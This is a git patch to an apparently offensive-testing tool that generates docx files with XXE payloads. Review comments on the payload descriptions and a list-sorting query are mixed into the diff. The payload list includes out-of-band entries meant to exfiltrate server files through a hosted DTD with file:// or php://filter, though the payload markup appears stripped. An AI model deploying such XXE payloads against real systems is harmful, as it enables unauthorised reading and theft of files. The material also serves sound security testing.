From 1a2cfd0376d3ddf8d846b910f13a99dc4d17038d Mon Sep 17 00:00:00 2001 From: Robert Vulpe Date: Thu, 11 Mar 2021 14:53:22 +0200 Subject: [PATCH] fixed oob payloads, small updates --- model/master.rb => lib/model.rb | 0 server.rb | 9 ++++----- views/list.haml | 2 +- 3 files changed, 5 insertions(+), 6 deletions(-) rename model/master.rb => lib/model.rb (100%) diff --git a/model/master.rb b/lib/model.rb similarity index 100% rename from model/master.rb rename to lib/model.rb diff --git a/server.rb b/server.rb index 4ac410a..3d0d0bd 100644 --- a/server.rb +++ b/server.rb @@ -8,7 +8,7 @@ require 'json' require './lib/util' -require './model/master' +require './lib/model' if not File.file?('./db/master.db') puts "|+| Database does not exist, initializing a blank one." @@ -18,7 +18,6 @@ end # TODO apply to all xml in docx -# TODO OOB is incorrect # TODO explain each menu item in help # TODO soft link content types 
@@ -36,8 +35,8 @@ def read_payloads() pl["Canary Parameter Entity"] = [' %xxe;]>', "A parameter entity check. This is valuable because the entity is checked immediately when the DOCTYPE is parsed. No malicious application but useful to check for."] pl["Plain External Parameter Entity"] = [' %a;]>', "A simple external parameter entity. Note, the file is the value for the payload; IP and PROTOCOL are ignored by OXML XXE. Useful because the entity is checked immediately when the DOCTYPE is parsed. "] pl["Recursive Parameter Entity"] = [' %b;]>',"Technically recursive parameter entities are not allowed by the XML spec. Should never work. Precursor to the billion laughs attack."] - pl["Out of Bounds Attack (using file://)"] = ['%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. See References."] - pl["Out of Bounds Attack (using php://filter)"] = ['%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."] + pl["Out of Bounds Attack (using file://)"] = ['%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. Details about building the dtd file at https://portswigger.net/web-security/xxe/blind."] + pl["Out of Bounds Attack (using php://filter)"] = ['%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."] return pl end @@ -232,7 +231,7 @@ def oxml_file_defaults() end get '/list' do - @files = Oxfile.all() + @files = Oxfile.all(:order => :id.desc) haml :list end diff --git a/views/list.haml b/views/list.haml index e978a2b..65fe124 100644 --- a/views/list.haml +++ b/views/list.haml 
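Review bot: Both OOB entries now pull in an external `%dtd;` parameter entity, but only the file:// description tells the user that the DTD is something they must build and host themselves, while the php://filter entry still ends with "See References." and the "Plain External Parameter Entity" entry above says IP and PROTOCOL are ignored, so a reader of the list cannot tell whether PROTOCOL/IP are consumed by the OOB payloads or whether the file:// versus php://filter choice lives in the generated document or in their hosted DTD. I would spell that out in both descriptions, for the second entry presumably along the lines of `"OOB is a useful technique to exfiltrate files when attacking blind. The document only fetches your DTD; that DTD must wrap the target file in php://filter/convert.base64-encode (available since PHP 5.0.0) and send the result back to you. Details at https://portswigger.net/web-security/xxe/blind."`. The payload strings themselves appear to have lost their XML markup in this rendering, so I cannot check the entity declaration; please confirm that `%dtd;` is declared as an external parameter entity whose system identifier uses the PROTOCOL/IP placeholders rather than a hard-coded host. `read_payloads` begins above this hunk.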
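Review bot: `Oxfile.all(:order => :id.desc)` orders by primary key, while the list heading changed in the same commit calls this "Sorted by Date Desc"; the two agree only as long as ids are handed out in creation order, which an auto-increment key gives you but is not what the label promises. If the Oxfile model carries a creation timestamp, ordering on it (`@files = Oxfile.all(:order => :created_at.desc)`, or whatever the column is called) would make the query match the label; otherwise a short comment would stop the next reader from "correcting" it, e.g. `# newest first; id is auto-increment, so it tracks creation order`. The model is not visible in this diff, so the field name is a guess. The `get '/list'` route is fully inside the hunk.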
@@ -1,6 +1,6 @@ .span5 %br - %h3 List Created Files + %h3 List Created Files (Sorted by Date Desc) %table{:style => 'width: 70%;'} %tbody %tr